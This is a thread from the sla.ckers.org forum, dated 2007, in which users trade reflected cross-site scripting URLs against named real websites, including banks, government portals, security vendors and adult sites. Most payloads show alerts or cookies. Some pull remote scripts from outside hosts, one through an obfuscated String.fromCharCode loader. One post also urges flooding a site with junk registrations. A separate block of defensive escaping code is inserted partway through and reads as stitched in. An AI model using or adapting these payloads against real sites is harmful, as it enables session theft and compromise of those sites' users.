Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: blad3
Date: May 02, 2007 06:44AM

Yes, like I said. I didn't find anything.
But people never cease to amaze me :)

Actually, if you look into the HTML source of http://www.thelookandsoundofperfect.com/ there is

var MMredirectURL = window.location;

and

+ '<param name="movie" value="flashplayer_install.swf?MMredirectURL='+MMredirectURL+'&MMplayerType=ActiveX&MMdoctitle='+MMdoctitle+'" />'
document.write(productInstallOETags); // embed the Flash Product Installation SWF

But this code is executed only if Flash is not installed.

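The pattern quoted in the post above (the page URL concatenated into a string that is passed to `document.write`), next to an encoded version. This is an added example, not part of the original post or the site's code; the function names, the sample URL and the document title are constructed for illustration.

```javascript
// Added example: helper names and sample input are hypothetical.

// Escape the characters that can end an attribute value or open a tag.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Pattern from the post: the page URL is concatenated as-is.
function buildParamUnsafe(redirectURL, docTitle) {
  return '<param name="movie" value="flashplayer_install.swf?MMredirectURL=' +
    redirectURL + '&MMplayerType=ActiveX&MMdoctitle=' + docTitle + '" />';
}

// Hardened form: percent-encode each query value, then HTML-escape
// the complete attribute value before it reaches document.write.
function buildParamSafe(redirectURL, docTitle) {
  const query = 'MMredirectURL=' + encodeURIComponent(redirectURL) +
    '&MMplayerType=ActiveX&MMdoctitle=' + encodeURIComponent(docTitle);
  return '<param name="movie" value="' +
    escapeHtmlAttr('flashplayer_install.swf?' + query) + '" />';
}

// Read MMredirectURL back out of the markup the way an HTML parser
// followed by a query-string parser would see it.
function readRedirect(markup) {
  const m = /value="([^"]*)"/.exec(markup);
  const value = m[1]
    .replace(/&quot;/g, '"').replace(/&#39;/g, "'")
    .replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
  const query = value.slice(value.indexOf('?') + 1);
  return new URLSearchParams(query).get('MMredirectURL');
}

// Constructed input: a page URL whose fragment carries markup.
const SAMPLE_URL = 'http://site.example/page#"><script>alert(1)</script>';
const unsafeMarkup = buildParamUnsafe(SAMPLE_URL, 'Home');
const safeMarkup = buildParamSafe(SAMPLE_URL, 'Home');
```

With the encoded builder the attribute stays closed and the SWF still receives the full original URL after decoding.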
Re: So it begins
Posted by: trev
Date: May 02, 2007 10:52AM

I didn't look at thelookandsoundofperfect.com until now. Here you have it:

http://www.thelookandsoundofperfect.com/popCover.php?img=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Cdiv%20dummy=%22

Here is how you can load any Flash movie into their content pane (maybe I should call this "Flash Injection" :)

[www.thelookandsoundofperfect.com]

Now you only need to find a redirect on their site to inject a video from a third-party site. And here are some scripts you might want to play around with (don't seem vulnerable however):

http://www.thelookandsoundofperfect.com/_dev/_lib/process_stf.php?yname=me&yemail=me@example.com&fname=him&femail=him@example.com
http://www.thelookandsoundofperfect.com/_dev/_lib/process_signup.php?email=me@example.com

Also, XSS in a page they are linking to:

http://www.soundandvisionmag.com/article.asp?section_id=60&article_id=2207&page_number=1asdf%22%2Balert('xss')%2B%22



Edited 2 time(s). Last edit at 05/02/2007 11:36AM by trev.

Re: So it begins
Posted by: blad3
Date: May 02, 2007 12:49PM

Thanks trev,
Nice findings :)

Re: So it begins
Posted by: trev
Date: May 02, 2007 06:42PM

In IE: [horo.mail.ru]
In Firefox: [horo.mail.ru]

Re: So it begins
Posted by: fyoung
Date: May 02, 2007 07:41PM

http://www.gnc.com/search/noResults.jsp?kw=<iframe%20src=http://google.com



Edited 1 time(s). Last edit at 05/02/2007 08:59PM by fyoung.

Re: So it begins
Date: May 05, 2007 12:13AM

http://www.marketingcrossing.com/lcvisitorjssearchresults.php?clsjobalert_searchsource=2&clsjobalert_hdnsubmited=1&clsjobalert_paraarray_jobtype=-1&clsjobalert_array_jobregion=-1&clsjobalert_paraarray_firmtype=-1&clsjobalert_keywords=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

In response to this: http://sla.ckers.org/forum/read.php?17,11152 =oD

Re: So it begins
Posted by: kirke
Date: May 06, 2007 02:59PM

http://www.iqfieber.de/anmelden.php?w=a%22%3E%3Cscript%3Ealert(42)%3C/script%3E
http://www.lebenstest.de/index.php?ac=ANMELDEN&w=a%22%3E%3Cscript%3Ealert(42)%3C/script%3E

same with nested injection (more than 10 alerts!)

http://www.lebenstest.de/index.php?email=e%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&firstname=v%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&lastname=n%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&street=s%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&hnr=&zipcode=p%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&city=o%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&country=-1&Date_Day=&Date_Month=0&Date_Year=&w=&agbcheck=1&ac=register&Submit=1&x=263&y=14

Contains multiple iframes; anyone out there to improve it to show them all? Don't hesitate to start millions of tests with foobar data, it's a junk site anyway ;-)

Re: So it begins
Posted by: backbone
Date: May 08, 2007 03:58AM

An XSS on miniclip.com

http://www.miniclip.com/games/en/gun-run/?query=<script>alert(navigator.appName)</script>

Not necessarily Gun Run, but that was a game that I was looking for before I discovered it...

Re: So it begins
Posted by: FR3DC3RV
Date: May 08, 2007 02:37PM

http://www.lrb.co.uk/search/index.php?contributor="><script>alert(document.cookie)</script>
http://lc.sduhsd.net/redir.php?url=http://<script>alert(document.cookie)</script>
http://www.redir.cz/static/redir_404.php?redirURL=f<script>alert(document.cookie)</script>
http://keetweej.vanheusden.com/redir.php?id=<script>alert(document.cookie)</script>
http://www.nhlbi.nih.gov/cgi-bin/redir.pl?url=http:/<script>alert(document.cookie)</script>
http://www.ntis.gov/search/results.asp?loc=3-0-0&SimpleSearch=yes&AVSearch=false&frm_qry_Search="><script>alert(document.cookie)</script>
http://www.statenews.com/do_search.phtml?keywords=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 05/08/2007 02:38PM by FR3DC3RV.

Re: So it begins
Posted by: Anonymous User
Date: May 08, 2007 04:44PM

ouch!

https://plugins-customers.nessus.org/support-center/index.php?form_submit=forgot_email&mod_id=6&forgot_email=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fh4k.in%2Fi.js%3E%3C%2Fscript%3E

Re: So it begins
Posted by: Anonymous User
Date: May 08, 2007 04:50PM

ouch!²

https://www.zonealarm.com/store/application;jsessionid=GAwSf4C5dJtd3A5PIG4e7TNkOv0tIU9JP0UHFsT9JD7HKigvl1Q2!-1992105728!-1062696903!7551!7552!NONE?namespace=zls_user&origin=glo%22%3E%3Cscript%3Eeval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))%3C/script%3Ebal.jsp&event=link.login&dc=34std&ctry=DE&lang=de

Re: So it begins
Posted by: beford
Date: May 10, 2007 12:16AM

http://groups.yahoo.com/convacct?email=owned%40gmail.com&list=tux%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E



Edited 2 time(s). Last edit at 05/10/2007 01:14AM by beford.

Re: So it begins
Date: May 10, 2007 02:56PM

http://www.java4less.com/RDataMatrix-php/demo.php?Submit=Press+to+apply+changes&CODE=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A&ENCODING=AUTO&FORMAT=&TILDE=N&MODULE_SIZE=4&QUITE_ZONE=10&BACK_COLOR=YELLOW&BAR_COLOR=BLACK&ROTATE=0&IMG_TYPE=PNG

demo pages are bad =o(

Re: So it begins
Posted by: tx
Date: May 11, 2007 01:46AM

http://www.search.com/search?q=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.lit=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.or=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.not=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.lang=&q.ft=&q.age=&q.site=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.link=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.related=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&submit=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&adv=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22

http://my.cnet.com/5303-4_92-0-2.html?tag=tab&ursRegID=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 05/11/2007 10:00AM by tx.

Re: So it begins
Posted by: nemessis
Date: May 11, 2007 05:47PM

Counter-Strike AmxMod - WebMod XSS

'http://games7.evolva.ro:27015/auth.w?redir="><script>alert(1337)</script>



Edited 1 time(s). Last edit at 05/11/2007 05:51PM by nemessis.

Re: So it begins
Posted by: thornmaker
Date: May 11, 2007 11:46PM

http://mynasa.nasa.gov/portal/bookmarks/BookmarkServlet?bookmark_title=NASA+Missions+Event+Archive&bookmark_url=javascript:alert(/ET%20phone%20home./);&bookmark_label=HERE%20BE%20DRAGONS<script>alert(/ET%20was%20here/)</script>

then go to http://mynasa.nasa.gov/portal/site/mynasa/index.jsp?image_pattern=02000 to fire

Re: So it begins
Posted by: kirke
Date: May 12, 2007 03:26PM

http://www.volvoautobank.de/cgi-bin/lk?hcurr=$%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&mvar=0&sversion=%5Bsversion%5D&ecode=%5Becode%5D&gcode=%5Bgcode%5D&svcode=%5Bsvcode%5D&tprice=%5Btprice%5D&preselect=4%7C0%7C0%7C4%7C0%7C0%7C7190%7Cp&hpg=p&target=pmt&skin=3&rpg=on&mod=5&fz=S80+2.5T&a=Kinetic&gp=37250%2C00+EUR&sa=0%2C00+EUR&ges=37250%2C00+EUR&iaa=71%22%3E%3Cu%3E9990%2C00+EUR&iar=19%2C30+%25&lz=36+Monate&ll=10.000+km
www.porschebank.at http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.porschebank.at/schadenmeldung.php&vertrag_nr=%22%3E%3Cscript%3Ealert(42)%3C/script%3E
http://www.porschebank.com/seite.php?s=22&b=xss%22'%3E%3Cscript%3Ealert(42)%3C/script%3E2&lang=de
http://www.nissanbank.de/nisbank.php?PHPSESSID=42%22%3E%3Cscript%3Ealert(42);%3C/script%3E
http://dcc1.daimlerchrysler-bank-aktionen.de/?c=3%22%3E%3Cframe%20src=javascript:alert(42);%20
https://www.gmac-fintoolscompact.com/au/contact/index.asp?toolname=contact&viewingCountry=us'%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&cntry_cd=au&lang_cd=en&target=Windows-x86&inframe=true



Edited 1 time(s). Last edit at 05/17/2007 01:53PM by kirke.

Re: So it begins
Posted by: Anonymous User
Date: May 13, 2007 05:09PM

For my friends at the AACS: http://www.hddvd.org/search/search-result.php?searchwords=%22%3E%3Cscript%3Ealert%28%27Oops%21+09f911029d74e35bd84156c5635688c0.%27%29%3B%3C%2Fscript%3E%3C%22&x=0&y=0

Re: So it begins
Posted by: nemessis
Date: May 13, 2007 05:23PM

.http://visasearch.visa.com/UsaSearch/query.html?qt=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&col=usa&qs=&ws=0&st=1&style=usa&x=11&y=7



Edited 1 time(s). Last edit at 05/13/2007 05:26PM by nemessis.

Re: So it begins
Posted by: nemessis
Date: May 13, 2007 05:48PM

:)https://shopping.ccbill.com/search.cgi?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&adult=0&generalSearch=%A0%A0%A0SEARCH%A0%A0%A0

Re: So it begins
Posted by: Kyran
Date: May 14, 2007 08:45PM

More nexopia.
Don't need to be logged in for these ones.

http://plus.www.nexopia.com/profile.php?requestType=query&requestParams%5BageRangeMin%5D='%3E%3Cscript%3Ealert(1)%3C/script%3E&requestParams%5BageRangeMax%5D='%3E%3Cscript%3Ealert(2)%3C/script%3E

Link fixed, but the hole is too.

- Kyran



Edited 1 time(s). Last edit at 05/15/2007 08:54PM by Kyran.

Re: So it begins
Posted by: WhiteAcid
Date: May 15, 2007 04:48PM

I'd just like to point out to the people finding all these XSS flaws that a new version of the XSS assistant is out, click here for more info: http://sla.ckers.org/forum/read.php?12,1919,11579,page=2#msg-11579

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: nemessis
Date: May 15, 2007 06:38PM

Imlive.com :)

http://imlive.com/warning.asp?wargotopage="><script>alert('Nemessis')</script>&cat=1&roomid=10

Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:02PM

enjoy.be

http://cams.enjoy.be/front_common/detail.php?account=c6349&ref=0016&mref=0016&language=NL&front=front_v5&previewdir="><script>alert(1337)</script>

Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:08PM

Flirt4free.com

http://www.flirt4free.com/login/?model_id=18301&service=girls&mp_code=0000&source_code="><script>alert('Nemessis-www.rstzone.net')</script>&PHPSESSID=b9d7fa98aaeb41f6c5c2f04f158fbdce

Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:22PM

Seventeenlive.com

http://www.seventeenlive.com/login/login.php?link=&username=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&password=sddddddddd&access_key=&submit=Login

Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:30PM

http://mail.k.ro/sm-bin/forgot_password?username=%22%3E%3Cscript%3Ealert%28%27Nemessis-www.rstzone.net%27%29%3C%2Fscript%3E

Re: So it begins
Posted by: nemessis
Date: May 15, 2007 08:17PM

https://www.epassporte.com/secure/forgot.cgi?uid=%22%3E%3Cscript%3Ealert%28%27Nemessis-www.rstzone.net%27%29%3C%2Fscript%3E&f_update_login.x=48&f_update_login.y=18&answer=

Re: So it begins
Posted by: thornmaker
Date: May 15, 2007 11:29PM

I know I shouldn't go pokin' around at the good publisher's site... but the irony factor was just too much... http://www.syngress.com/catalog/lq_l.cfm?error=email&pid=4360&name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E<div%20name=%22&email=&company=&companyURL=&phone=&comments=

Re: So it begins
Posted by: nemessis
Date: May 16, 2007 06:12PM

www.undernet.org

http://www.undernet.org/news/index.php?page=2&session="><script>alert(1337)</script>
